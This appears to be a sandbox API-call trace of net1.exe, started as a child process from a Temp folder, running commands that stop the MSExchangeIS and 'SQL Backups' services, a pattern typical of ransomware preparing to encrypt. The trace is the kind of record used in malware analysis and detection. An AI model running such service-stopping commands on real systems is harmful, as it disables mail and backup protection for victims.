[0123.631] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeIS") returned -1 [0123.631] _wcsicmp (_String1="alerter", _String2="MSExchangeIS") returned -12 [0123.631] _wcsicmp (_String1="netlogon", _String2="MSExchangeIS") returned 1 [0123.632] _wcsupr (in: _String="MSExchangeIS" | out: _String="MSEXCHANGEIS") returned="MSEXCHANGEIS" [0123.632] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7054b0 [0124.388] GetServiceKeyNameW (in: hSCManager=0x7054b0, lpDisplayName="MSEXCHANGEIS", lpServiceName=0xe5aaf0, lpcchBuffer=0x2cfab0 | out: lpServiceName="", lpcchBuffer=0x2cfab0) returned 0 [0124.388] _wcsicmp (_String1="msg", _String2="MSEXCHANGEIS") returned 2 [0124.389] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEIS") returned -14 [0124.389] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEIS") returned 5 [0124.389] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEIS") returned 5 [0124.389] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEIS") returned 5 [0124.389] _wcsicmp (_String1="redir", _String2="MSEXCHANGEIS") returned 5 [0124.389] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEIS") returned 5 [0124.389] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEIS") returned 10 [0124.389] _wcsicmp (_String1="work", _String2="MSEXCHANGEIS") returned 10 [0124.389] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEIS") returned 10 [0124.389] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEIS") returned 3 [0124.389] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEIS") returned -9 [0124.389] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEIS") returned -1 [0124.389] _wcsicmp (_String1="server", _String2="MSEXCHANGEIS") returned 6 [0124.389] _wcsicmp (_String1="svr", _String2="MSEXCHANGEIS") returned 6 [0124.389] _wcsicmp (_String1="srv", _String2="MSEXCHANGEIS") returned 6 [0124.389] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEIS") returned -1 [0124.389] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEIS") returned -12 [0124.389] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEIS") returned 1 [0124.389] NetServiceControl (in: servername=0x0, service="MSEXCHANGEIS", opcode=0x0, arg=0x0, bufptr=0x2cfaac | out: bufptr=0x2cfaac) returned 0x889 [0124.391] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.391] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0124.391] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0124.393] GetFileType (hFile=0x0) returned 0x0 [0124.393] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x703ed0 [0124.393] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x703ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0124.393] WriteFile (in: hFile=0x0, lpBuffer=0x703ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cf9ec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf9ec, lpOverlapped=0x0) returned 0 [0124.393] LocalFree (hMem=0x703ed0) returned 0x0 [0124.393] GetFileType (hFile=0x0) returned 0x0 [0124.393] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706178 [0124.393] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0124.393] WriteFile (in: hFile=0x0, lpBuffer=0x706178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf9ec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf9ec, lpOverlapped=0x0) returned 0 [0124.393] LocalFree (hMem=0x706178) returned 0x0 [0124.393] _ultow (in: _Dest=0x889, _Radix=2947612 | out: _Dest=0x889) returned="2185" [0124.393] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0124.393] GetFileType (hFile=0x0) returned 0x0 [0124.393] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x706178 [0124.393] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x706178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0124.393] WriteFile (in: hFile=0x0, lpBuffer=0x706178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cf9f8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf9f8, lpOverlapped=0x0) returned 0 [0124.393] LocalFree (hMem=0x706178) returned 0x0 [0124.393] GetFileType (hFile=0x0) returned 0x0 [0124.393] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706178 [0124.393] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0124.393] WriteFile (in: hFile=0x0, lpBuffer=0x706178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf9f8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf9f8, lpOverlapped=0x0) returned 0 [0124.394] LocalFree (hMem=0x706178) returned 0x0 [0124.394] NetApiBufferFree (Buffer=0x701ae8) returned 0x0 [0124.394] NetApiBufferFree (Buffer=0x701b00) returned 0x0 [0124.394] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS /y" [0124.394] exit (_Code=2) Process: id = "270" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4f2f9000" os_pid = "0x1338" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "96" os_parent_pid = "0xfa8" cmd_line = "C:\\Windows\\system32\\net1 stop “SQL Backups /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 668 os_tid = 0x132c [0123.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fccc | out: lpSystemTimeAsFileTime=0x31fccc*(dwLowDateTime=0x1d733950, dwHighDateTime=0x1d6f0d1)) [0123.661] GetCurrentProcessId () returned 0x1338 [0123.661] GetCurrentThreadId () returned 0x132c [0123.661] GetTickCount () returned 0x11522bd [0123.661] QueryPerformanceCounter (in: lpPerformanceCount=0x31fcc4 | out: lpPerformanceCount=0x31fcc4*=24276200046) returned 1 [0123.661] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0123.661] __set_app_type (_Type=0x1) [0123.661] __p__fmode () returned 0x770331f4 [0123.662] __p__commode () returned 0x770331fc [0123.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0123.662] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0123.662] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.662] GetConsoleOutputCP () returned 0x1b5 [0123.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0123.663] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.667] sprintf_s (in: _DstBuf=0x31fc84, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.667] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.669] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0123.669] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.669] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “SQL Backups /y" [0123.669] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31fa50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0123.670] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x70) returned 0x793ae0 [0123.670] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.670] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fc54 | out: Buffer=0x31fc54*=0x791ae8) returned 0x0 [0123.670] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fc54 | out: Buffer=0x31fc54*=0x791b00) returned 0x0 [0123.670] _fileno (_File=0x77032900) returned -2 [0123.670] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0123.670] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.670] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.670] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.670] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.670] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.670] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.670] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.670] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.670] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.670] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.670] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.670] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.670] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.671] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.671] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.671] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.671] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.671] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.671] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.671] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.671] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.671] _wcsicmp (_String1="accounts", _String2="“SQL") returned -8123 [0123.671] _wcsicmp (_String1="computer", _String2="“SQL") returned -8121 [0123.671] _wcsicmp (_String1="config", _String2="“SQL") returned -8121 [0123.671] _wcsicmp (_String1="continue", _String2="“SQL") returned -8121 [0123.671] _wcsicmp (_String1="cont", _String2="“SQL") returned -8121 [0123.671] _wcsicmp (_String1="file", _String2="“SQL") returned -8118 [0123.671] _wcsicmp (_String1="files", _String2="“SQL") returned -8118 [0123.671] _wcsicmp (_String1="group", _String2="“SQL") returned -8117 [0123.671] _wcsicmp (_String1="groups", _String2="“SQL") returned -8117 [0123.671] _wcsicmp (_String1="help", _String2="“SQL") returned -8116 [0123.671] _wcsicmp (_String1="helpmsg", _String2="“SQL") returned -8116 [0123.671] _wcsicmp (_String1="localgroup", _String2="“SQL") returned -8112 [0123.671] _wcsicmp (_String1="pause", _String2="“SQL") returned -8108 [0123.671] _wcsicmp (_String1="session", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="sessions", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="sess", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="share", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="start", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="stats", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="statistics", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="stop", _String2="“SQL") returned -8105 [0123.671] _wcsicmp (_String1="time", _String2="“SQL") returned -8104 [0123.671] _wcsicmp (_String1="user", _String2="“SQL") returned -8103 [0123.671] _wcsicmp (_String1="users", _String2="“SQL") returned -8103 [0123.671] _wcsicmp (_String1="msg", _String2="“SQL") returned -8111 [0123.672] _wcsicmp (_String1="messenger", _String2="“SQL") returned -8111 [0123.672] _wcsicmp (_String1="receiver", _String2="“SQL") returned -8106 [0123.672] _wcsicmp (_String1="rcv", _String2="“SQL") returned -8106 [0123.672] _wcsicmp (_String1="netpopup", _String2="“SQL") returned -8110 [0123.672] _wcsicmp (_String1="redirector", _String2="“SQL") returned -8106 [0123.672] _wcsicmp (_String1="redir", _String2="“SQL") returned -8106 [0123.672] _wcsicmp (_String1="rdr", _String2="“SQL") returned -8106 [0123.672] _wcsicmp (_String1="workstation", _String2="“SQL") returned -8101 [0123.672] _wcsicmp (_String1="work", _String2="“SQL") returned -8101 [0123.672] _wcsicmp (_String1="wksta", _String2="“SQL") returned -8101 [0123.672] _wcsicmp (_String1="prdr", _String2="“SQL") returned -8108 [0123.672] _wcsicmp (_String1="devrdr", _String2="“SQL") returned -8120 [0123.672] _wcsicmp (_String1="lanmanworkstation", _String2="“SQL") returned -8112 [0123.672] _wcsicmp (_String1="server", _String2="“SQL") returned -8105 [0123.672] _wcsicmp (_String1="svr", _String2="“SQL") returned -8105 [0123.672] _wcsicmp (_String1="srv", _String2="“SQL") returned -8105 [0123.672] _wcsicmp (_String1="lanmanserver", _String2="“SQL") returned -8112 [0123.672] _wcsicmp (_String1="alerter", _String2="“SQL") returned -8123 [0123.672] _wcsicmp (_String1="netlogon", _String2="“SQL") returned -8110 [0123.672] _wcsicmp (_String1="accounts", _String2="Backups") returned -1 [0123.672] _wcsicmp (_String1="computer", _String2="Backups") returned 1 [0123.672] _wcsicmp (_String1="config", _String2="Backups") returned 1 [0123.672] _wcsicmp (_String1="continue", _String2="Backups") returned 1 [0123.672] _wcsicmp (_String1="cont", _String2="Backups") returned 1 [0123.672] _wcsicmp (_String1="file", _String2="Backups") returned 4 [0123.672] _wcsicmp (_String1="files", _String2="Backups") returned 4 [0123.672] _wcsicmp (_String1="group", _String2="Backups") returned 5 [0123.672] _wcsicmp (_String1="groups", _String2="Backups") returned 5 [0123.672] _wcsicmp (_String1="help", _String2="Backups") returned 6 [0123.672] _wcsicmp (_String1="helpmsg", _String2="Backups") returned 6 [0123.673] _wcsicmp (_String1="localgroup", _String2="Backups") returned 10 [0123.673] _wcsicmp (_String1="pause", _String2="Backups") returned 14 [0123.673] _wcsicmp (_String1="session", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="sessions", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="sess", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="share", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="start", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="stats", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="statistics", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="stop", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="time", _String2="Backups") returned 18 [0123.673] _wcsicmp (_String1="user", _String2="Backups") returned 19 [0123.673] _wcsicmp (_String1="users", _String2="Backups") returned 19 [0123.673] _wcsicmp (_String1="msg", _String2="Backups") returned 11 [0123.673] _wcsicmp (_String1="messenger", _String2="Backups") returned 11 [0123.673] _wcsicmp (_String1="receiver", _String2="Backups") returned 16 [0123.673] _wcsicmp (_String1="rcv", _String2="Backups") returned 16 [0123.673] _wcsicmp (_String1="netpopup", _String2="Backups") returned 12 [0123.673] _wcsicmp (_String1="redirector", _String2="Backups") returned 16 [0123.673] _wcsicmp (_String1="redir", _String2="Backups") returned 16 [0123.673] _wcsicmp (_String1="rdr", _String2="Backups") returned 16 [0123.673] _wcsicmp (_String1="workstation", _String2="Backups") returned 21 [0123.673] _wcsicmp (_String1="work", _String2="Backups") returned 21 [0123.673] _wcsicmp (_String1="wksta", _String2="Backups") returned 21 [0123.673] _wcsicmp (_String1="prdr", _String2="Backups") returned 14 [0123.673] _wcsicmp (_String1="devrdr", _String2="Backups") returned 2 [0123.673] _wcsicmp (_String1="lanmanworkstation", _String2="Backups") returned 10 [0123.673] _wcsicmp (_String1="server", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="svr", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="srv", _String2="Backups") returned 17 [0123.673] _wcsicmp (_String1="lanmanserver", _String2="Backups") returned 10 [0123.673] _wcsicmp (_String1="alerter", _String2="Backups") returned -1 [0123.673] _wcsicmp (_String1="netlogon", _String2="Backups") returned 12 [0124.395] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.395] SetThreadUILanguage (LangId=0x0) returned 0x409 [0124.395] wcscpy_s (in: _Destination=0x31f754, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0124.396] LoadLibraryW (lpLibFileName="neth.dll") returned 0x71240000 [0124.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x31f750, nSize=0x0, Arguments=0x31f74c | out: lpBuffer="哈yneth.dll") returned 0xff [0124.398] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0124.398] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.398] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0124.398] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0124.398] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0124.398] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.398] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0124.398] _wcsicmp (_String1="CONT", _String2="“SQL") returned -8121 [0124.398] _wcsicmp (_String1="CONT", _String2="Backups") returned 1 [0124.398] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.398] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0124.398] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0124.399] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.399] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0124.399] _wcsicmp (_String1="FILES", _String2="“SQL") returned -8118 [0124.399] _wcsicmp (_String1="FILES", _String2="Backups") returned 4 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.399] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0124.399] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0124.399] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.399] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0124.399] _wcsicmp (_String1="GROUPS", _String2="“SQL") returned -8117 [0124.399] _wcsicmp (_String1="GROUPS", _String2="Backups") returned 5 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.399] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0124.399] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0124.399] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.399] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0124.399] _wcsicmp (_String1="REPL", _String2="“SQL") returned -8106 [0124.399] _wcsicmp (_String1="REPL", _String2="Backups") returned 16 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0124.399] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.399] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0124.399] _wcsicmp (_String1="REPLICATOR", _String2="“SQL") returned -8106 [0124.399] _wcsicmp (_String1="REPLICATOR", _String2="Backups") returned 16 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.399] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0124.399] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.399] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0124.399] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.399] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0124.400] _wcsicmp (_String1="SESSIONS", _String2="“SQL") returned -8105 [0124.400] _wcsicmp (_String1="SESSIONS", _String2="Backups") returned 17 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0124.400] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.400] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0124.400] _wcsicmp (_String1="SESS", _String2="“SQL") returned -8105 [0124.400] _wcsicmp (_String1="SESS", _String2="Backups") returned 17 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.400] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0124.400] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0124.400] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.400] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0124.400] _wcsicmp (_String1="STATS", _String2="“SQL") returned -8105 [0124.400] _wcsicmp (_String1="STATS", _String2="Backups") returned 17 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.400] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0124.400] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0124.400] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.400] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0124.400] _wcsicmp (_String1="USERS", _String2="“SQL") returned -8103 [0124.400] _wcsicmp (_String1="USERS", _String2="Backups") returned 19 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.400] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0124.400] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0124.400] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.400] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0124.400] _wcsicmp (_String1="REDIRECTOR", _String2="“SQL") returned -8106 [0124.400] _wcsicmp (_String1="REDIRECTOR", _String2="Backups") returned 16 [0124.400] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0124.401] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.401] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0124.401] _wcsicmp (_String1="REDIR", _String2="“SQL") returned -8106 [0124.401] _wcsicmp (_String1="REDIR", _String2="Backups") returned 16 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0124.401] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.401] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0124.401] _wcsicmp (_String1="RDR", _String2="“SQL") returned -8106 [0124.401] _wcsicmp (_String1="RDR", _String2="Backups") returned 16 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0124.401] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.401] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0124.401] 